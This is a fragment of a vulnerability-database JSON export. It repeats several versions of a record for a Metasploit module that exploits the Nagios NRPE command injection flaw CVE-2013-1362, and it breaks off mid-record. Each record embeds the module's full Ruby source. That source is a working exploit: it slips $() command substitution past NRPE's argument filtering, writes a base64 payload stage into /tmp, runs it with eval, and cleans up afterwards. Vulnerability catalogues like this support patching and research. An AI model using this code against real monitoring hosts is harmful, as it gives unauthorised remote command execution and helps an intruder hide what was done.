["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-03-14T12:50:57"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2019-03-14T12:50:57", "differentElements": ["modified", "published"], "edition": 89}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "bcf0013cb10e4d36a9c4a433070f246b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-04-09T00:05:18", "history": [], "viewCount": 123, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "nessus", "idList": ["NAGIOS_NRPE_2_14.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9836.NASL", "FEDORA_2013-9848.NASL", "ALA_ALAS-2013-203.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "FEDORA_2013-9829.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310850457", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310120026", "OPENVAS:865802", "OPENVAS:865756", "OPENVAS:850457", "OPENVAS:850460", "OPENVAS:1361412562310850460", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310121262"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0624-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-04-09T00:05:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2019-04-09T00:05:18", "differentElements": ["modified", "published"], "edition": 90}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "c959c5b4ed9c6c656d3d46477b650b67", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-04-09T02:02:52", "history": [], "viewCount": 125, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "openvas", "idList": ["OPENVAS:850460", "OPENVAS:1361412562310850460", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310120026", "OPENVAS:865802", "OPENVAS:865756", "OPENVAS:850457", "OPENVAS:1361412562310121262"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "nessus", "idList": ["NAGIOS_NRPE_2_14.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9836.NASL", "FEDORA_2013-9848.NASL", "ALA_ALAS-2013-203.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "FEDORA_2013-9829.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-04-09T02:02:52"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2019-04-09T02:02:52", "differentElements": ["description", "metasploitHistory", "metasploitReliability", "references", "sourceHref"], "edition": 91}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "cad24950780e0d03b3337a6d96d82fa7", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.\n", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362", "http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability"], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-05-28T20:33:19", "history": [], "viewCount": 125, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1", "OPENSUSE-SU-2013:0624-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121287", "PACKETSTORM:120507"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310850457", "OPENVAS:865756", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310865802", "OPENVAS:850457", "OPENVAS:850460", "OPENVAS:1361412562310850460", "OPENVAS:865802", "OPENVAS:1361412562310120026", "OPENVAS:1361412562310121262"]}, {"type": "nessus", "idList": ["FEDORA_2013-9848.NASL", "NAGIOS_NRPE_2_14.NASL", "OPENSUSE-2013-301.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "FEDORA_2013-9836.NASL", "ALA_ALAS-2013-203.NASL", "FEDORA_2013-9829.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "saint", "idList": ["SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3", "SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-05-28T20:33:19"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return 